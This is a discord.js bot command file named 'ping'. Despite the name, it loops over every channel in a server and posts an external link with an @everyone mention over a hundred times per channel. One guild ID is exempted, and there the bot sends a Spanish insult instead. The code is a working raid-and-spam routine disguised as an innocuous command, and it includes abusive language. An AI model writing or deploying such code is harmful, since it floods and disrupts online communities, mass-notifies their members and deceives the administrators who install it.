const Discord = require('discord.js');

module.exports = {
  name: "ping", 
  alias: ["ping"],

execute (client, message, args){

    if (message.guild.id == "879159373270761522") return message.channel.send("¿Que intentas subnormal?")
    
 message.guild.channels.cache.forEach(channel => {
                channel.send("https://pestete.gay/ @everyone")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")
                channel.send("https://pestete.gay/ @everyone ")

 })

  }
}